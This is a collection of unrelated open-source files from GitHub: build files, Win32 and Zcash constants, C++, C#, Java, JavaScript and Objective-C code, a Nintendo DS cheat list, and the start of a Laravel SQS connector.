// $Maintainer: Timo Sachsenberg $
// $Authors: $
// --------------------------------------------------------------------------
//
| {
"pile_set_name": "Github"
} |
#
# CDDL HEADER START
#
# The contents of this file are subject to the terms
# of the Common Development and Distribution License
# (the "License"). You may not use this file except
# in compliance with the License.
#
# You can obtain a copy of the license at
# src/OPENSOLARIS.LICENSE
# or http://www.opensolaris.org/os/licensing.
# See the License for the specific language governing
# permissions and limitations under the License.
#
# When distributing Covered Code, include this CDDL
# HEADER in each file and include the License file at
# usr/src/OPENSOLARIS.LICENSE. If applicable,
# add the following below this CDDL HEADER, with the
# fields enclosed by brackets "[]" replaced with your
# own identifying information: Portions Copyright [yyyy]
# [name of copyright owner]
#
# CDDL HEADER END
#
#
# Copyright 2005 Sun Microsystems, Inc. All rights reserved.
# Use is subject to license terms.
#
# ident "@(#)Makefile.Darwin 1.5 05/08/04 SMI"
#
# Build settings for Darwin (macOS / embedded) libMicro targets.
# SDKROOT may be overridden on the command line to build against a given SDK.
SDKROOT ?= /
Product=$(shell tconf --product)
Embedded=$(shell tconf --test TARGET_OS_EMBEDDED)
# When targeting an embedded OS, resolve the SDK path and point the
# compiler's sysroot at it.
ifeq "$(Embedded)" "YES"
SDKPATH = $(shell xcodebuild -sdk $(SDKROOT) -version Path)
CFLAGS += -isysroot $(SDKPATH)
endif
CC = xcrun -sdk $(SDKROOT) gcc
#NOPIC= -mdynamic-no-pic
ARCH= i386
# "fat" builds both 32- and 64-bit slices; otherwise build the single ARCH.
ifeq "$(strip $(ARCH))" "fat"
ARCH_FLAG= -arch i386 -arch x86_64
else
ARCH_FLAG= -arch $(ARCH)
endif
### OPT_FLAG value was modified from '-g' to '-Os' as part of the fix for radar 7508837
OPT_FLAG= -Os
SEMOP_FLAG= -DUSE_SEMOP
# SEMOP is not available on the embedded targets.
ifeq "$(Embedded)" "YES"
SEMOP_FLAG=
endif
###
###CFLAGS= -Os -DUSE_SEMOP -fno-builtin $(NOPIC) $(ARCH_FLAG) -Wall
###extra_CFLAGS= -Os -DUSE_SEMOP -fno-builtin $(NOPIC) $(ARCH_FLAG) -Wall
###
CFLAGS+= $(OPT_FLAG) $(SEMOP_FLAG) -DUSE_GETHRTIME -fno-builtin $(NOPIC) $(ARCH_FLAG) -Wall
ifeq "$(Embedded)" "YES"
#CFLAGS+= $(OPT_FLAG) -DUSE_GETHRTIME -fno-builtin $(NOPIC) $(ARCH_FLAG) -Wall
CFLAGS+= -g -I $(SDKPATH)/System/Library/Frameworks/System.framework/Versions/B/PrivateHeaders/ -F/AppleInternal/Library/Frameworks/ $(MORECFLAGS)
endif
extra_CFLAGS= $(OPT_FLAG) $(SEMOP_FLAG) -fno-builtin $(NOPIC) $(ARCH_FLAG) -Wall
CPPFLAGS= $(SEMOP_FLAG) -D_REENTRANT -Wall
MATHLIB= -lm
# Benchmarks excluded from the build on Darwin.
# BUG FIX: the last entry previously ended with a trailing backslash, which
# continued the variable definition onto the `include` line below and
# silently swallowed the include directive.
ELIDED_BENCHMARKS= \
	cachetocache \
	atomic \
	getcontext \
	setcontext
include ../Makefile.com.Darwin
| {
"pile_set_name": "Github"
} |
// Copyright (c) Microsoft Corporation.
// Licensed under the MIT License.
namespace BuildXL.Native.IO
{
    /// <summary>
    /// Constants that are used for file I/O inside the Native layer.
    /// Values mirror the corresponding Win32 FSCTL_* device I/O control codes
    /// and ERROR_* system error codes (winerror.h).
    /// </summary>
    public static class NativeIOConstants
    {
        /// <summary>
        /// FSCTL_READ_FILE_USN_DATA
        /// </summary>
        public const uint FsctlReadFileUsnData = 0x900eb;

        /// <summary>
        /// FSCTL_WRITE_USN_CLOSE_RECORD
        /// </summary>
        public const uint FsctlWriteUsnCloseRecord = 0x900ef;

        /// <summary>
        /// FSCTL_QUERY_USN_JOURNAL
        /// </summary>
        public const uint FsctlQueryUsnJournal = 0x900f4;

        /// <summary>
        /// FSCTL_READ_USN_JOURNAL
        /// </summary>
        public const uint FsctlReadUsnJournal = 0x900bb;

        /// <summary>
        /// FSCTL_READ_UNPRIVILEGED_USN_JOURNAL
        /// </summary>
        public const uint FsctlReadUnprivilegedUsnJournal = 0x903ab;

        /// <summary>
        /// FVE_LOCKED_VOLUME
        /// </summary>
#pragma warning disable SA1139 // Use literal suffix notation instead of casting
        public const int FveLockedVolume = unchecked((int)0x80310000);
#pragma warning restore SA1139

        /// <summary>
        /// INVALID_FILE_ATTRIBUTES
        /// </summary>
        public const uint InvalidFileAttributes = 0xFFFFFFFF;

        /// <summary>
        /// ERROR_JOURNAL_NOT_ACTIVE
        /// </summary>
        public const uint ErrorJournalNotActive = 0x49B;

        /// <summary>
        /// ERROR_JOURNAL_DELETE_IN_PROGRESS
        /// </summary>
        public const uint ErrorJournalDeleteInProgress = 0x49A;

        /// <summary>
        /// ERROR_JOURNAL_ENTRY_DELETED
        /// </summary>
        public const uint ErrorJournalEntryDeleted = 0x49D;

        /// <summary>
        /// ERROR_NO_MORE_FILES
        /// </summary>
        public const uint ErrorNoMoreFiles = 0x12;

        /// <summary>
        /// ERROR_WRITE_PROTECT
        /// </summary>
        public const uint ErrorWriteProtect = 0x13;

        /// <summary>
        /// ERROR_INVALID_PARAMETER
        /// </summary>
        public const int ErrorInvalidParameter = 0x57;

        /// <summary>
        /// ERROR_INVALID_FUNCTION
        /// </summary>
        public const uint ErrorInvalidFunction = 0x1;

        /// <summary>
        /// ERROR_ONLY_IF_CONNECTED
        /// </summary>
        public const uint ErrorOnlyIfConnected = 0x4E3;

        /// <summary>
        /// ERROR_SUCCESS
        /// </summary>
        public const int ErrorSuccess = 0x0;

        /// <summary>
        /// ERROR_ACCESS_DENIED
        /// </summary>
        public const int ErrorAccessDenied = 0x5;

        /// <summary>
        /// ERROR_SHARING_VIOLATION
        /// </summary>
        public const int ErrorSharingViolation = 0x20;

        /// <summary>
        /// ERROR_TOO_MANY_LINKS
        /// </summary>
        public const int ErrorTooManyLinks = 0x476;

        /// <summary>
        /// ERROR_NOT_SAME_DEVICE
        /// </summary>
        public const int ErrorNotSameDevice = 0x11;

        /// <summary>
        /// ERROR_NOT_SUPPORTED
        /// </summary>
        public const int ErrorNotSupported = 0x32;

        /// <summary>
        /// ERROR_FILE_NOT_FOUND
        /// </summary>
        public const int ErrorFileNotFound = 0x2;

        /// <summary>
        /// ERROR_FILE_EXISTS
        /// </summary>
        public const int ErrorFileExists = 0x50;

        /// <summary>
        /// ERROR_ALREADY_EXISTS (0xB7; the previous summary named a
        /// nonexistent "ERROR_FILE_ALREADY_EXISTS" code)
        /// </summary>
        public const int ErrorAlreadyExists = 0xB7;

        /// <summary>
        /// ERROR_PATH_NOT_FOUND
        /// </summary>
        public const int ErrorPathNotFound = 0x3;

        /// <summary>
        /// ERROR_NOT_READY
        /// </summary>
        public const int ErrorNotReady = 0x15;

        /// <summary>
        /// ERROR_DIR_NOT_EMPTY
        /// </summary>
        public const int ErrorDirNotEmpty = 0x91;

        /// <summary>
        /// ERROR_DIRECTORY
        /// </summary>
        public const int ErrorDirectory = 0x10b;

        /// <summary>
        /// ERROR_PARTIAL_COPY
        /// </summary>
        public const int ErrorPartialCopy = 0x12b;

        /// <summary>
        /// ERROR_IO_PENDING
        /// </summary>
        public const int ErrorIOPending = 0x3E5;

        /// <summary>
        /// ERROR_IO_INCOMPLETE
        /// </summary>
        public const int ErrorIOIncomplete = 0x3E4;

        /// <summary>
        /// ERROR_ABANDONED_WAIT_0
        /// </summary>
        public const int ErrorAbandonedWait0 = 0x2DF;

        /// <summary>
        /// ERROR_HANDLE_EOF
        /// </summary>
        public const int ErrorHandleEof = 0x26;

        /// <summary>
        /// ERROR_TIMEOUT
        /// </summary>
        public const int ErrorTimeout = 0x5B4;

        /// <summary>
        /// ERROR_PIPE_BUSY.
        /// </summary>
        public const int ErrorPipeBusy = 0xE7;

        /// <summary>
        /// Infinite timeout.
        /// </summary>
        public const int Infinite = -1;

#if PLATFORM_WIN
        /// <summary>
        /// Maximum path length.
        /// </summary>
        public const int MaxPath = 260;
#else
        /// <summary>
        /// Maximum path length.
        /// </summary>
        public const int MaxPath = 1024;
#endif

        /// <summary>
        /// Maximum path length for \\?\ style paths.
        /// </summary>
        public const int MaxLongPath = 32767;

        /// <summary>
        /// Maximum path length for directory.
        /// </summary>
        public const int MaxDirectoryPath = 248;

        /// <summary>
        /// ERROR_CANT_ACCESS_FILE
        /// </summary>
        public const int ErrorCantAccessFile = 0x780;

        /// <summary>
        /// ERROR_BAD_PATHNAME
        /// </summary>
        public const int ErrorBadPathname = 0xA1;

        /// <summary>
        /// ERROR_INVALID_NAME
        /// </summary>
        public const int ErrorInvalidName = 0x7B;
    }
}
| {
"pile_set_name": "Github"
} |
// Copyright (c) 2016 The Zcash developers
// Distributed under the MIT software license, see the accompanying
// file COPYING or https://www.opensource.org/licenses/mit-license.php .
#include "asyncrpcoperation.h"
#include <boost/uuid/uuid.hpp>
#include <boost/uuid/uuid_generators.hpp>
#include <boost/uuid/uuid_io.hpp>
#include <string>
#include <ctime>
#include <chrono>
using namespace std;

// Shared generator used to mint a unique id for every operation.
// NOTE(review): boost::uuids::random_generator is not documented as
// thread-safe; confirm operations are only constructed from one thread
// (or serialize access) before relying on this.
static boost::uuids::random_generator uuidgen;

// Human-readable state names reported by getStatus()/getStateAsString().
static std::map<OperationStatus, std::string> OperationStatusMap = {
    {OperationStatus::READY, "queued"},
    {OperationStatus::EXECUTING, "executing"},
    {OperationStatus::CANCELLED, "cancelled"},
    {OperationStatus::FAILED, "failed"},
    {OperationStatus::SUCCESS, "success"}
};
/**
 * Every operation instance should have a globally unique id.
 *
 * Ids have the form "opid-<uuid>"; the creation timestamp is recorded and
 * the operation starts in the READY state.
 */
AsyncRPCOperation::AsyncRPCOperation() : error_code_(0), error_message_() {
    // Set a unique reference for each operation
    boost::uuids::uuid uuid = uuidgen();
    id_ = "opid-" + boost::uuids::to_string(uuid);
    creation_time_ = (int64_t)time(NULL);
    set_state(OperationStatus::READY);
}
// Copy constructor: snapshots every field of `o`. The atomic state_ is
// copied via load(); the mutex lock_ is default-constructed (mutexes are
// not copyable), so the copy owns an independent lock.
// NOTE(review): fields of `o` are read without holding o.lock_; copying an
// operation that is concurrently executing may observe a torn snapshot —
// confirm copies are only made of quiescent operations.
AsyncRPCOperation::AsyncRPCOperation(const AsyncRPCOperation& o) :
    id_(o.id_), creation_time_(o.creation_time_), state_(o.state_.load()),
    start_time_(o.start_time_), end_time_(o.end_time_),
    error_code_(o.error_code_), error_message_(o.error_message_),
    result_(o.result_)
{
}
// Member-wise copy assignment. Every assignment below is safe under
// self-assignment, so no explicit `this != &other` guard is needed.
AsyncRPCOperation& AsyncRPCOperation::operator=( const AsyncRPCOperation& other ) {
    this->id_ = other.id_;
    this->creation_time_ = other.creation_time_;
    // state_ is atomic and has no copy assignment; transfer via load/store.
    this->state_.store(other.state_.load());
    this->start_time_ = other.start_time_;
    this->end_time_ = other.end_time_;
    this->error_code_ = other.error_code_;
    this->error_message_ = other.error_message_;
    this->result_ = other.result_;
    return *this;
}
// Out-of-line destructor (empty); kept so the vtable/type info is emitted
// in this translation unit.
AsyncRPCOperation::~AsyncRPCOperation() {
}
/**
 * Request cancellation of this operation.
 *
 * Only a READY (queued, not yet executing) operation can be cancelled here.
 * Override this method in subclasses that are able to interrupt main()
 * while it is executing.
 */
void AsyncRPCOperation::cancel() {
    if (!isReady()) {
        return;
    }
    set_state(OperationStatus::CANCELLED);
}
/**
 * Start timing the execution run of the code you're interested in.
 *
 * Called from the worker thread; lock_ guards start_time_ against
 * concurrent readers.
 */
void AsyncRPCOperation::start_execution_clock() {
    std::lock_guard<std::mutex> guard(lock_);
    start_time_ = std::chrono::system_clock::now();
}
/**
 * Stop timing the execution run.
 *
 * Called from the worker thread; lock_ guards end_time_ against
 * concurrent readers.
 */
void AsyncRPCOperation::stop_execution_clock() {
    std::lock_guard<std::mutex> guard(lock_);
    end_time_ = std::chrono::system_clock::now();
}
/**
 * Implement this virtual method in any subclass. This is just an example
 * implementation showing the expected lifecycle: bail out if already
 * cancelled, move to EXECUTING, time the work, then record either an
 * error (FAILED) or a result (SUCCESS).
 */
void AsyncRPCOperation::main() {
    if (isCancelled()) {
        return;
    }
    set_state(OperationStatus::EXECUTING);
    start_execution_clock();
    // Do some work here..
    stop_execution_clock();
    // If there was an error, you might set it like this:
    /*
    setErrorCode(123);
    setErrorMessage("Murphy's law");
    setState(OperationStatus::FAILED);
    */
    // Otherwise, if the operation was a success:
    UniValue v(UniValue::VSTR, "We have a result!");
    set_result(v);
    set_state(OperationStatus::SUCCESS);
}
/**
 * Return the error of the completed operation as a UniValue object.
 * If there is no error, return null UniValue.
 */
UniValue AsyncRPCOperation::getError() const {
    // Only FAILED operations carry an error payload.
    if (!isFailed()) {
        return NullUniValue;
    }
    // Guard error_code_/error_message_, which the worker thread may write.
    std::lock_guard<std::mutex> guard(lock_);
    UniValue error(UniValue::VOBJ);
    error.pushKV("code", this->error_code_);
    error.pushKV("message", this->error_message_);
    return error;
}
/**
 * Return the result of the completed operation as a UniValue object.
 * If the operation did not succeed, return null UniValue.
 */
UniValue AsyncRPCOperation::getResult() const {
    // Only SUCCESSful operations carry a result.
    if (!isSuccess()) {
        return NullUniValue;
    }
    // Guard result_, which the worker thread writes via set_result().
    std::lock_guard<std::mutex> guard(lock_);
    return this->result_;
}
/**
 * Returns a status UniValue object.
 * If the operation has failed, it will include an error object.
 * If the operation has succeeded, it will include the result value.
 * If the operation was cancelled, there will be no error object or result value.
 */
UniValue AsyncRPCOperation::getStatus() const {
    OperationStatus status = this->getState();
    UniValue obj(UniValue::VOBJ);
    obj.pushKV("id", this->id_);
    obj.pushKV("status", OperationStatusMap[status]);
    obj.pushKV("creation_time", this->creation_time_);
    // TODO: Issue #1354: There may be other useful metadata to return to the user.
    UniValue err = this->getError();
    if (!err.isNull()) {
        obj.pushKV("error", err.get_obj());
    }
    UniValue result = this->getResult();
    if (!result.isNull()) {
        obj.pushKV("result", result);
        // Include execution time for successful operation
        // NOTE(review): start_time_/end_time_ are read here WITHOUT lock_,
        // unlike in start/stop_execution_clock(). Taking lock_ here would
        // deadlock, because getError()/getResult() above already acquire
        // the same non-recursive mutex. This looks safe only because a
        // non-null result implies SUCCESS, which implies the clock was
        // already stopped — confirm that invariant holds for subclasses.
        std::chrono::duration<double> elapsed_seconds = end_time_ - start_time_;
        obj.pushKV("execution_secs", elapsed_seconds.count());
    }
    return obj;
}
/**
* Return the operation state in human readable form.
*/
std::string AsyncRPCOperation::getStateAsString() const {
OperationStatus status = this->getState();
return OperationStatusMap[status];
}
| {
"pile_set_name": "Github"
} |
<Project Sdk="Microsoft.NET.Sdk.Web">
<PropertyGroup>
<TargetFramework>netcoreapp2.1</TargetFramework>
<DockerDefaultTargetOS>Linux</DockerDefaultTargetOS>
<UserSecretsId>57bcf1e9-cc41-49b6-b2eb-edca5c429e52</UserSecretsId>
<RootNamespace>ContosoTravel.Web.Host.DataService</RootNamespace>
<AssemblyName>ContosoTravel.Web.Host.DataService</AssemblyName>
</PropertyGroup>
<ItemGroup>
<Folder Include="wwwroot\" />
</ItemGroup>
<ItemGroup>
<PackageReference Include="Autofac" Version="4.8.1" />
<PackageReference Include="Autofac.Extensions.DependencyInjection" Version="4.3.0" />
<PackageReference Include="Microsoft.ApplicationInsights.AspNetCore" Version="2.5.1" />
<PackageReference Include="Microsoft.AspNetCore.App" />
<PackageReference Include="Microsoft.Azure.Services.AppAuthentication" Version="1.0.3" />
<PackageReference Include="Microsoft.Extensions.Configuration" Version="2.1.1" />
<PackageReference Include="Microsoft.Extensions.Configuration.Abstractions" Version="2.1.1" />
<PackageReference Include="Microsoft.Extensions.Configuration.AzureKeyVault" Version="2.1.1" />
<PackageReference Include="Microsoft.Extensions.Configuration.Binder" Version="2.1.1" />
<PackageReference Include="Microsoft.Extensions.Configuration.EnvironmentVariables" Version="2.1.1" />
<PackageReference Include="Microsoft.Extensions.Configuration.FileExtensions" Version="2.1.1" />
<PackageReference Include="Microsoft.Extensions.Configuration.Json" Version="2.1.1" />
<PackageReference Include="Microsoft.VisualStudio.Web.CodeGeneration.Design" Version="2.1.5" />
<PackageReference Include="NETStandard.Library" Version="2.0.3" />
<PackageReference Include="Nito.AsyncEx.Context" Version="1.1.0" />
<PackageReference Include="Nito.AsyncEx.Coordination" Version="1.0.2" />
<PackageReference Include="TimeZoneConverter" Version="2.4.2" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\Application\Application.csproj" />
</ItemGroup>
<ItemGroup>
<Content Update="appsettings.json">
<CopyToOutputDirectory>Always</CopyToOutputDirectory>
</Content>
</ItemGroup>
</Project>
| {
"pile_set_name": "Github"
} |
using System;
using System.Collections.Generic;
using System.Linq;
namespace PhysX.Samples.EventsSample
{
/// <summary>
/// Console entry point for the PhysX events sample.
/// </summary>
public class Program
{
    // NOTE(review): [STAThread] suggests the sample hosts a Windows UI
    // message loop inside EventsSample — confirm against that class.
    [STAThread]
    static void Main(string[] args)
    {
        // Constructing the sample runs it; the instance is intentionally
        // not retained.
        new EventsSample();
    }
}
} | {
"pile_set_name": "Github"
} |
import {
bootstrapModeler,
inject
} from 'test/TestHelper';
import modelingModule from 'src/features/modeling';
import coreModule from 'src/core';
// Regression tests for shape deletion: removing a shape must unlink its
// business object from the model ($parent becomes null), and undo/redo
// must restore and re-apply that unlinking.
describe('features/modeling - delete elements', function() {

  var testModules = [ coreModule, modelingModule ];

  // DMN fixture containing the 'temperature_id' input-data element.
  var inputDataXML = require('../../../fixtures/dmn/input-data.dmn');

  beforeEach(bootstrapModeler(inputDataXML, { modules: testModules }));

  describe('shape handling', function() {

    it('should execute', inject(function(elementRegistry, modeling) {

      // given
      var inputDataShape = elementRegistry.get('temperature_id'),
          inputData = inputDataShape.businessObject;

      // when
      modeling.removeShape(inputDataShape);

      // then
      expect(inputData.$parent).to.be.null;
    }));

  });

  describe('undo support', function() {

    it('should undo', inject(function(elementRegistry, modeling, commandStack) {

      // given
      var inputDataShape = elementRegistry.get('temperature_id'),
          inputData = inputDataShape.businessObject,
          parent = inputData.$parent;

      // when
      modeling.removeShape(inputDataShape);
      commandStack.undo();

      // then
      expect(inputData.$parent).to.eql(parent);
    }));

  });

  describe('redo support', function() {

    it('redo', inject(function(elementRegistry, modeling, commandStack) {

      // given
      var inputDataShape = elementRegistry.get('temperature_id'),
          inputData = inputDataShape.businessObject;

      // when
      modeling.removeShape(inputDataShape);
      commandStack.undo();
      commandStack.redo();

      // then
      expect(inputData.$parent).to.be.null;
    }));

  });

});
| {
"pile_set_name": "Github"
} |
package org.smpte_ra.schemas.st2067_2_2013;
import java.util.ArrayList;
import java.util.List;
import javax.xml.bind.annotation.XmlAccessType;
import javax.xml.bind.annotation.XmlAccessorType;
import javax.xml.bind.annotation.XmlAnyElement;
import javax.xml.bind.annotation.XmlAttribute;
import javax.xml.bind.annotation.XmlMixed;
import javax.xml.bind.annotation.XmlSchemaType;
import javax.xml.bind.annotation.XmlType;
import org.w3c.dom.Element;
/**
* <p>Java class for DigestMethodType complex type.
*
* <p>The following schema fragment specifies the expected content contained within this class.
*
* <pre>
* <complexType name="DigestMethodType">
* <complexContent>
* <restriction base="{http://www.w3.org/2001/XMLSchema}anyType">
* <sequence>
* <any processContents='lax' namespace='##other' maxOccurs="unbounded" minOccurs="0"/>
* </sequence>
* <attribute name="Algorithm" use="required" type="{http://www.w3.org/2001/XMLSchema}anyURI" />
* </restriction>
* </complexContent>
* </complexType>
* </pre>
*
*
*/
// NOTE(review): this class has the shape of JAXB (xjc) generated code; if it
// is ever regenerated from the schema, hand edits here will be lost.
@XmlAccessorType(XmlAccessType.FIELD)
@XmlType(name = "DigestMethodType", propOrder = {
    "content"
})
public class DigestMethodType {

    // Mixed content: text nodes interleaved with arbitrary elements from
    // other namespaces, per the schema's <any processContents='lax'>.
    @XmlMixed
    @XmlAnyElement(lax = true)
    protected List<Object> content;
    // Required digest algorithm identifier (xs:anyURI).
    @XmlAttribute(name = "Algorithm", required = true)
    @XmlSchemaType(name = "anyURI")
    protected String algorithm;

    /**
     * Gets the value of the content property.
     *
     * <p>
     * This accessor method returns a reference to the live list,
     * not a snapshot. Therefore any modification you make to the
     * returned list will be present inside the JAXB object.
     * This is why there is not a <CODE>set</CODE> method for the content property.
     *
     * <p>
     * For example, to add a new item, do as follows:
     * <pre>
     *    getContent().add(newItem);
     * </pre>
     *
     *
     * <p>
     * Objects of the following type(s) are allowed in the list
     * {@link String }
     * {@link Object }
     * {@link Element }
     *
     *
     */
    public List<Object> getContent() {
        // Lazily initialized so JAXB unmarshalling can populate it directly.
        if (content == null) {
            content = new ArrayList<Object>();
        }
        return this.content;
    }

    /**
     * Gets the value of the algorithm property.
     *
     * @return
     *     possible object is
     *     {@link String }
     *
     */
    public String getAlgorithm() {
        return algorithm;
    }

    /**
     * Sets the value of the algorithm property.
     *
     * @param value
     *     allowed object is
     *     {@link String }
     *
     */
    public void setAlgorithm(String value) {
        this.algorithm = value;
    }

}
| {
"pile_set_name": "Github"
} |
// Module fixture: exposes a literal value and re-exports a sibling module.
exports.abc = 1;
exports.def = require("./other.js");
| {
"pile_set_name": "Github"
} |
//! Constants for the Zcash main network.

/// The mainnet coin type for ZEC, as defined by [SLIP 44].
///
/// [SLIP 44]: https://github.com/satoshilabs/slips/blob/master/slip-0044.md
pub const COIN_TYPE: u32 = 133;

/// The HRP for a Bech32-encoded mainnet [`ExtendedSpendingKey`].
///
/// Defined in [ZIP 32].
///
/// [`ExtendedSpendingKey`]: zcash_primitives::zip32::ExtendedSpendingKey
/// [ZIP 32]: https://github.com/zcash/zips/blob/master/zip-0032.rst
pub const HRP_SAPLING_EXTENDED_SPENDING_KEY: &str = "secret-extended-key-main";

/// The HRP for a Bech32-encoded mainnet [`ExtendedFullViewingKey`].
///
/// Defined in [ZIP 32].
///
/// [`ExtendedFullViewingKey`]: zcash_primitives::zip32::ExtendedFullViewingKey
/// [ZIP 32]: https://github.com/zcash/zips/blob/master/zip-0032.rst
pub const HRP_SAPLING_EXTENDED_FULL_VIEWING_KEY: &str = "zxviews";

/// The HRP for a Bech32-encoded mainnet [`PaymentAddress`].
///
/// Defined in section 5.6.4 of the [Zcash Protocol Specification].
///
/// [`PaymentAddress`]: zcash_primitives::primitives::PaymentAddress
/// [Zcash Protocol Specification]: https://github.com/zcash/zips/blob/master/protocol/protocol.pdf
pub const HRP_SAPLING_PAYMENT_ADDRESS: &str = "zs";

/// The prefix for a Base58Check-encoded mainnet [`TransparentAddress::PublicKey`].
///
/// Addresses with this prefix encode as strings beginning with "t1"
/// (see the Zcash Protocol Specification, transparent encodings).
///
/// [`TransparentAddress::PublicKey`]: zcash_primitives::legacy::TransparentAddress::PublicKey
pub const B58_PUBKEY_ADDRESS_PREFIX: [u8; 2] = [0x1c, 0xb8];

/// The prefix for a Base58Check-encoded mainnet [`TransparentAddress::Script`].
///
/// Addresses with this prefix encode as strings beginning with "t3"
/// (see the Zcash Protocol Specification, transparent encodings).
///
/// [`TransparentAddress::Script`]: zcash_primitives::legacy::TransparentAddress::Script
pub const B58_SCRIPT_ADDRESS_PREFIX: [u8; 2] = [0x1c, 0xbd];
"pile_set_name": "Github"
} |
//
// Generated by class-dump 3.5 (64 bit).
//
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2013 by Steve Nygard.
//
#import "NSObject.h"
@class IMAPGateway, NSArray, NSMutableArray, NSString;
// Per-mailbox IMAP state mirrored from the server: message counts, UID
// bookkeeping, CONDSTORE modification sequences, quota data, and a queue of
// not-yet-processed untagged responses.
//
// NOTE(review): this header was recovered with class-dump, so the comments
// below are inferred from the declared names — confirm against the binary.
@interface IMAPMailbox : NSObject
{
    id <IMAPMailboxDelegate> _delegate;   // notified of mailbox changes; cleared via -clearDelegate:
    unsigned long long _exists;           // presumably the IMAP EXISTS count — confirm
    unsigned int _permanentFlags;         // bitmask from the PERMANENTFLAGS response
    BOOL _hasNewResponses;                // set when _unprocessedResponses gains entries
    unsigned long long _allegedHighestModificationSequence;    // HIGHESTMODSEQ as reported by the server
    unsigned long long _computedHighestModificationSequence;   // HIGHESTMODSEQ derived locally from responses
    BOOL _allegedHighestModificationSequenceHasBeenInitialized;
    BOOL _computedHighestModificationSequenceHasBeenInitialized;
    BOOL _readOnly;                       // mailbox selected via EXAMINE / read-only
    BOOL _uidNotSticky;                   // UIDNOTSTICKY — UIDs may not persist
    BOOL _supportsModificationSequences;  // server supports CONDSTORE mod-sequences
    unsigned int _uidNext;                // predicted UID of the next arriving message
    unsigned int _uidValidity;            // UIDVALIDITY; a change invalidates cached UIDs
    unsigned int _unseenCount;            // count of unseen messages
    id <MCMailbox> _mailbox;              // backing local mailbox model object
    NSString *_referenceName;             // mailbox name as referenced on the wire
    IMAPGateway *_selectedGateway;        // gateway/connection that currently has this mailbox selected
    NSArray *_quotaRoots;                 // QUOTAROOT names for this mailbox
    NSMutableArray *_unprocessedResponses; // FIFO of server responses awaiting processing
    CDStruct_d3e19d9e _quotaUsage;        // usage/limit pair(s) from QUOTA responses
}

// KVO notifications for these properties are posted manually, not automatically.
+ (BOOL)automaticallyNotifiesObserversOfQuotaUsage;
+ (BOOL)automaticallyNotifiesObserversOfAllegedHighestModificationSequence;
+ (BOOL)automaticallyNotifiesObserversOfExists;

@property(retain) NSMutableArray *unprocessedResponses; // @synthesize unprocessedResponses=_unprocessedResponses;
@property BOOL supportsModificationSequences; // @synthesize supportsModificationSequences=_supportsModificationSequences;
@property unsigned int unseenCount; // @synthesize unseenCount=_unseenCount;
@property unsigned int uidNext; // @synthesize uidNext=_uidNext;
@property CDStruct_d3e19d9e quotaUsage; // @synthesize quotaUsage=_quotaUsage;
@property(retain) NSArray *quotaRoots; // @synthesize quotaRoots=_quotaRoots;
@property BOOL uidNotSticky; // @synthesize uidNotSticky=_uidNotSticky;
@property BOOL readOnly; // @synthesize readOnly=_readOnly;
@property(copy) NSString *referenceName; // @synthesize referenceName=_referenceName;
@property(retain) id <MCMailbox> mailbox; // @synthesize mailbox=_mailbox;

- (id)description;
// Dequeue/enqueue server responses awaiting processing.
- (id)removeResponse;
- (void)addResponse:(id)arg1;
@property(nonatomic) unsigned int permanentFlags;
- (void)setTotalSize:(unsigned long long)arg1 forQuotaMessageCount:(long long)arg2;
@property unsigned long long computedHighestModificationSequence;
@property unsigned long long allegedHighestModificationSequence;
@property BOOL hasNewResponses;
@property unsigned int uidValidity; // @synthesize uidValidity=_uidValidity;
@property unsigned long long exists;
// Variant setter distinguishing updates that arrived via IDLE notifications.
- (void)setExists:(unsigned long long)arg1 fromIDLE:(BOOL)arg2;
@property(retain) IMAPGateway *selectedGateway; // @synthesize selectedGateway=_selectedGateway;
- (void)clearDelegate:(id)arg1;
- (void)setDelegate:(id)arg1;
- (id)init;
- (id)initWithMailboxName:(id)arg1;
- (void)dealloc;
@end
| {
"pile_set_name": "Github"
} |
cheats = 6
cheat0_desc = "Press L Ability Max"
cheat0_code = "94000130+FDFF0000+120F19EC+000003E8+D0000000+00000000"
cheat0_enable = false
cheat1_desc = "Press X Block is 999"
cheat1_code = "94000136+FFFE0000+B20F19E0+00000000+1000016C+000003E7+D2000000+00000000"
cheat1_enable = false
cheat2_desc = "All Stage in Story Book"
cheat2_code = "D5000000+00000003+C0000000+00000010+D7000000+020F055C+D2000000+00000000"
cheat2_enable = false
cheat3_desc = "All Stage and Omega"
cheat3_code = "D5000000+000000FF+C0000000+00000010+D7000000+020F055C+D2000000+00000000"
cheat3_enable = false
cheat4_desc = "Backlight Codes"
cheat5_desc = "DS Lite Backlight Control"
cheat5_code = "94000130+FCFB0000+023FE074+012FFF11+E0000000+000000A8+E28F0001+E12FFF10+A21AB5F0+88234C24+80138811+D02A428B+25803490+F0002000+1C06F82A+F0002004+2703F826+21404007+D003420B+420B2180+E018D00C+4231210C+2F03D006+1C79D013+F0002004+E00EF816+E0094331+438E210C+2F001C31+1E79D004+F0002004+E002F80A+F0002000+BCF0F806+4718BC08+30800000+88222100+D1FC422A+80224A08+88208060+D1FC4228+80220C12+88228061+D1FC422A+21FF8860+47704008+04000130+80028802+023FE074+E3520003+D2000000+00000000"
cheat5_enable = false
| {
"pile_set_name": "Github"
} |
/*
* JBoss, Home of Professional Open Source
* Copyright 2014, Red Hat, Inc., and individual contributors
* by the @authors tag. See the copyright.txt in the distribution for a
* full listing of individual contributors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
* http://www.apache.org/licenses/LICENSE-2.0
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.jboss.weld.tests.unit.ejb.subclass;
/**
 * Local business interface for the {@code Bar} EJB exercised by the
 * subclass unit tests in this package.
 */
public interface BarLocal {

    /**
     * Simple probe operation.
     *
     * @return an implementation-defined value; NOTE(review): the tests appear
     *         to use it only to verify the bean is invocable — confirm
     *         against the implementing bean class.
     */
    int ping();
}
| {
"pile_set_name": "Github"
} |
<?php
namespace Illuminate\Queue\Connectors;
use Aws\Sqs\SqsClient;
use Illuminate\Support\Arr;
use Illuminate\Queue\SqsQueue;
class SqsConnector implements ConnectorInterface
{
    /**
     * Establish a queue connection.
     *
     * Merges sane SDK defaults (latest API version, 60s HTTP timeouts) under
     * the user-supplied configuration, then builds an SqsQueue around a
     * freshly constructed SqsClient.
     *
     * @param  array  $config  connection config; recognized keys include
     *                         "key", "secret", "queue", plus any SqsClient options
     * @return \Illuminate\Contracts\Queue\Queue
     */
    public function connect(array $config)
    {
